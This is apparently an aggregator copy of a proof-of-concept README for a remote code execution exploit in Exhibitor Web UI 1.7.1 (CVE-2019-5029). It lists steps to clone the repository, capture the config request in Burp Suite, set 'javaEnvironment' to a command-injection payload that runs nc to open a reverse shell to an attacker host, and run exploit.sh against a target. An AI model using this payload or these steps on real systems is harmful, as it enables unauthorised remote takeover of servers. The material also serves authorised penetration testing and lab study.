关联漏洞
Description
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
介绍
# Exhibitor-RCE
Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029
## Step 1:
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
## Step 2:
$ cd Exihibitor-RCE/
## Step 3 (optional):
You might need to edit json data payload in the script. To do that simply capture the request using burpsuite when comiting the changes in the config tab of exihibitor and copy pasting into the curl command in the script.
<div style="text-align:center;">
<img src="https://raw.githubusercontent.com/thehunt1s0n/Exihibitor-RCE/main/media/burpsuite_capture.png" alt="gif 1" width="500"/>
</div>
Make sure to change the javaEnvironment with the following:
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
## Step 4:
./exploit.sh <host> <port> <attacker_host> <attacker_port>
Example:
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
文件快照
[4.0K] /data/pocs/c2a43d99eb3ef31848cad19aba41a5c216b60efe
├── [2.4K] exploit.sh
├── [4.0K] media
│ ├── [ 83K] burpsuite_capture.png
│ └── [654K] Exihibitor_capture.gif
└── [ 967] README.md
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。